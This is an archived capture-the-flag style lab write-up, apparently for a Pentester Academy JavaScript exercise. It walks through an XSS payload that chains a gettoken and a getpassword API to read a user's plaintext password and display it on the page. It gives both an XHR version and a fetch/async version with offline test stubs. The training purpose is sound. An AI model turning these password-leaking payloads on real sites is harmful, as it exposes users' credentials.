This repository has been archived by the owner on Jun 2, 2022. It is now read-only.

TASK_20.md

Task 20 [Try Now]

Objectives:

  1. Find John's Password using an XSS vulnerability on this page
  2. Display the Password in the div with id "result"
  3. App stores password in Plain Text :(
  4. No Hardcoded values can be used - everything has to be figured out dynamically

So when I checked the source code for this task, I found the two APIs. Yep, again a lengthy payload 🤦

Also, the gettoken response is JSON.

Luckily we have XMLHttpRequest.responseType = "json", which parses the response body as JSON for us as soon as it arrives, so there is no need to call JSON.parse on responseText 😄

So let's use XHR and complete this task:

```javascript
// The uid is derived dynamically (objective 4): the last four characters of the
// first anchor's text on the page.
let uid = document.querySelector("a").innerText.trim().slice(-4);

// Step 1: ask gettoken for a token for this uid. responseType "json" makes the
// browser parse the body, so this.response is already an object.
const xhr1 = new XMLHttpRequest();
xhr1.responseType = "json";

xhr1.onreadystatechange = function () {
  // readyState 4 == DONE; only then is status meaningful.
  if (this.readyState == 4 && this.status == 200) {
    // Step 2: exchange the token for the password.
    const xhr2 = new XMLHttpRequest();
    xhr2.responseType = "json";

    xhr2.onreadystatechange = function () {
      if (this.readyState == 4 && this.status == 200) {
        // Objective 2: write the plaintext password into the #result div.
        document.querySelector("#result").innerText = this.response.resp.password;
      }
    };
    xhr2.open("GET", "http://pentesteracademylab.appspot.com/lab/webapp/jfp/20/getpassword?token=" + this.response.params.token, true);
    xhr2.send();
  }
};
xhr1.open("GET", "http://pentesteracademylab.appspot.com/lab/webapp/jfp/20/gettoken?uid=" + uid, true);
xhr1.send();
```

In XHR, the parsed JSON response is accessed via XMLHttpRequest.response. Note that once responseType is set to "json", reading responseText throws an InvalidStateError, so response is the only way to get at the body.
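As an added example (not the writeup's own payload), here is the same gettoken -> getpassword chain written with fetch() and async/await, which avoids the nested onreadystatechange callbacks that make the XHR version long. The endpoint paths and the response fields params.token and resp.password are taken from the XHR payload above; the fetchImpl and doc parameters are injected so the stub fetch and stub document at the bottom (constructed for offline testing, with hypothetical values rather than the lab's real responses) can exercise it.

```javascript
// Added example, not the writeup's own payload: the same gettoken -> getpassword
// chain written with fetch() and async/await instead of nested XHR callbacks.
// Endpoint paths and the response fields (params.token, resp.password) come from
// the XHR payload in this writeup; fetchImpl and doc are injected so the function
// can be exercised offline with the stubs at the bottom.
const BASE = "http://pentesteracademylab.appspot.com/lab/webapp/jfp/20/";

// Derive the uid dynamically, exactly as the XHR payload does: the last four
// characters of the first anchor's text (no hardcoded values, per objective 4).
function extractUid(doc) {
  return doc.querySelector("a").innerText.trim().slice(-4);
}

// GET a JSON endpoint; refuse non-2xx so an error page is never parsed as a token.
async function getJson(fetchImpl, url) {
  const res = await fetchImpl(url);
  if (!res.ok) throw new Error(`HTTP ${res.status} for ${url}`);
  return res.json(); // parsed object, like xhr.response with responseType "json"
}

// Chain the two APIs and return the plaintext password.
// encodeURIComponent keeps a token containing '+', '&' or '=' from breaking the query.
async function leakPassword(fetchImpl, doc) {
  const uid = extractUid(doc);
  const tok = await getJson(fetchImpl, BASE + "gettoken?uid=" + encodeURIComponent(uid));
  const pw = await getJson(fetchImpl, BASE + "getpassword?token=" + encodeURIComponent(tok.params.token));
  return pw.resp.password;
}

// The payload as it would run in the browser: write the password into #result.
async function runPayload(fetchImpl = fetch, doc = document) {
  const password = await leakPassword(fetchImpl, doc);
  doc.querySelector("#result").innerText = password;
  return password;
}

// --- Constructed offline stubs (hypothetical values, not the lab's real responses) ---
const fakeDoc = {
  els: { a: { innerText: " user1234 " }, "#result": { innerText: "" } },
  querySelector(selector) { return this.els[selector]; },
};

async function fakeFetch(url) {
  const json = (body) => ({ ok: true, status: 200, json: async () => body });
  if (url.endsWith("gettoken?uid=1234")) return json({ params: { token: "tok-abc" } });
  if (url.endsWith("getpassword?token=tok-abc")) return json({ resp: { password: "hunter2" } });
  return { ok: false, status: 404, json: async () => ({}) };
}

// Run the payload against the stubs; resolves to the leaked password.
function demo() {
  return runPayload(fakeFetch, fakeDoc);
}

demo().then((pw) => console.log("leaked:", pw));
```

In the real lab you would call runPayload() with no arguments so it uses the page's own fetch and document; the stubs exist only so the chaining logic can be checked without network access.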

For POC, Click Here